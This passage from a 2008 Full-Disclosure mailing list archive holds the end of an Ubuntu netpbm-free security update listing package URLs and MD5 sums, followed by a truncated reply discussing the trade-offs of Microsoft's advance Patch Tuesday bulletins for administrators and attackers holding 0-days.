    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-10ubuntu1.1_powerpc.deb
      Size/MD5:   119082 a0f1c6d1fcdcf0751232728d074488eb
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-10ubuntu1.1_powerpc.deb
      Size/MD5:    78724 d5c49cdfb811c9f10dad44fb098a09b4

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-10ubuntu1.1_sparc.deb
      Size/MD5:   111480 cc24c22f5ed7c2d993dff941ca1278d2
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-10ubuntu1.1_sparc.deb
      Size/MD5:    62984 cd32c55c8d99a810046d1e852876db66
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-10ubuntu1.1_sparc.deb
      Size/MD5:  1192324 ae062ef40a1cc92a5927b1d4aada29a7
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-10ubuntu1.1_sparc.deb
      Size/MD5:   111684 c2141a22c826a11065214829f8391c68
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-10ubuntu1.1_sparc.deb
      Size/MD5:    68932 35081c20279458fa43675fb68e2590b1

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm-free_10.0-11ubuntu0.1.diff.gz
      Size/MD5:    50599 0558b91bb50122e9b8d97db673547f1c
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm-free_10.0-11ubuntu0.1.dsc
      Size/MD5:     1261 885d22265365eda670af9b89253ae1df
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm-free_10.0.orig.tar.gz
      Size/MD5:  1926538 985e9f6d531ac0b2004f5cbebdeea87d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-11ubuntu0.1_amd64.deb
      Size/MD5:   117796 949f0dd3e907cefed173791194f4569c
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-11ubuntu0.1_amd64.deb
      Size/MD5:    69278 727407bf53689821cdc4f1a5d160687b
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-11ubuntu0.1_amd64.deb
      Size/MD5:  1259144 42f2b5a581deaf809c831fd5142fc3df
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-11ubuntu0.1_amd64.deb
      Size/MD5:   118266 9ff4f5fa4973cbc142255afadbfc6642
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-11ubuntu0.1_amd64.deb
      Size/MD5:    77262 d5666a23440e23e4cf8c2bb77adbfd64

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-11ubuntu0.1_i386.deb
      Size/MD5:   109480 d18aadd3ceed2454beb3358111799b24
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-11ubuntu0.1_i386.deb
      Size/MD5:    65090 9c5cd559bf82a9d8cb3050f7641b5030
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-11ubuntu0.1_i386.deb
      Size/MD5:  1193458 afa6c3e0a74b0c690625767b31cdf3b5
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-11ubuntu0.1_i386.deb
      Size/MD5:   109640 ccd27f32c25b529c51e751821a1adc14
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-11ubuntu0.1_i386.deb
      Size/MD5:    71574 52e294370c9f5239bd4ea018f66132d3

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-11ubuntu0.1_lpia.deb
      Size/MD5:   109476 99c83cb6461416e9dcbf004defb67783
    http://ports.ubuntu.com/pool/main/n/netpbm-free/libnetpbm10_10.0-11ubuntu0.1_lpia.deb
      Size/MD5:    64636 b009900becf643ce5da0ebe0f7994bc4
    http://ports.ubuntu.com/pool/main/n/netpbm-free/netpbm_10.0-11ubuntu0.1_lpia.deb
      Size/MD5:  1210064 1dbfa228b0a857bb517c068a1823b875
    http://ports.ubuntu.com/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-11ubuntu0.1_lpia.deb
      Size/MD5:   109596 4356f5e395921e3d1ca1f9c916705d33
    http://ports.ubuntu.com/pool/universe/n/netpbm-free/libnetpbm9_10.0-11ubuntu0.1_lpia.deb
      Size/MD5:    70978 c6ba0efc2b1cdc0d04de9c670db3ee88

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-11ubuntu0.1_powerpc.deb
      Size/MD5:   119718 f6c14468c7d34aad12aa44e20a34ee8c
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-11ubuntu0.1_powerpc.deb
      Size/MD5:    72230 d717b745f707bfda7f266c3fb654b913
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-11ubuntu0.1_powerpc.deb
      Size/MD5:  1570838 9456e2d126e50e7569a0c7f35ecefb72
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-11ubuntu0.1_powerpc.deb
      Size/MD5:   120036 3fd5889c1ccab9d5f2b8a9718fb810ca
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-11ubuntu0.1_powerpc.deb
      Size/MD5:    85384 7575c0ac65d2d748cf4946ba1ccac931

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-11ubuntu0.1_sparc.deb
      Size/MD5:   112128 d073826b938434f12d3fea1b2c8de8f4
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-11ubuntu0.1_sparc.deb
      Size/MD5:    64596 390b364d2efb37312a6470da82601417
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-11ubuntu0.1_sparc.deb
      Size/MD5:  1239510 d8c259674b5241bd23702f36ed7572f9
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-11ubuntu0.1_sparc.deb
      Size/MD5:   112318 ce2e6033bca4f16fafaf608b22d87150
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-11ubuntu0.1_sparc.deb
      Size/MD5:    70588 332d02f00dafb2f4ac5b72fb5a04de56


-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/84f02ab7/attachment.bin 

From Valdis.Kletnieks at vt.edu  Fri Nov  7 16:18:01 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 07 Nov 2008 11:18:01 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: Your message of "Fri, 07 Nov 2008 07:18:18 GMT."
	<1bde4ec50811062318k1f3d51d7rec374a6e7f74dce9@mail.gmail.com>
References: <20081107063354.78C1E2003F@smtp.hushmail.com>
	<1bde4ec50811062318k1f3d51d7rec374a6e7f74dce9@mail.gmail.com>
Message-ID: <19028.1226074681@turing-police.cc.vt.edu>

On Fri, 07 Nov 2008 07:18:18 GMT, Col said:

> I don't think any hacker is going to bother spending 5 days looking
> for a needle in a haystack when he can reverse engineer specific files
> once the patch is released. I know very little of looking for pointers
> in DLLs but from what I've seen it looks like a bit of a nightmare.
> The best way is to "diff" two files - the un-patched and the patched
> then you see where the changes are.

You're closer than most, but nobody's nailed the *actual* trade-off involved:

1) Large sites need a heads-up so they can form at least a rough estimate
of how much time/effort they will need to put in to deploying patches before
the guys who are doing diffs of binaries get their exploits.  If it's a low
rating, they can afford to do a lot of regression testing and deploy on a
relaxed timetable ("Oh, the guys over in XYZ have their weekly consolidation
run tonight, we'll upgrade them *tomorrow* night" versus "Screw the XYZ
run, we're pushing this in 2 hours whether they like it or not").

2) There's a very high chance that at least some percent of the black-hat
community is sitting on a 0-day exploit for these, that they've been using
for directed attacks under the radar (and in fact, a good chance that the
bulletin was issued because somebody's attack *didn't* go under the radar,
and that's how the white hats got a copy of the exploit).  This bulletin
is a heads-up to those black hats that their 0-day is going to be dropping
in value a lot starting Tuesday - so it's "smoke em if you got em" time.

For bonus points - compute what percent of advisories released next week
that *claim* to be reverse-engineering of the binary diff are actually
drops of 0-days t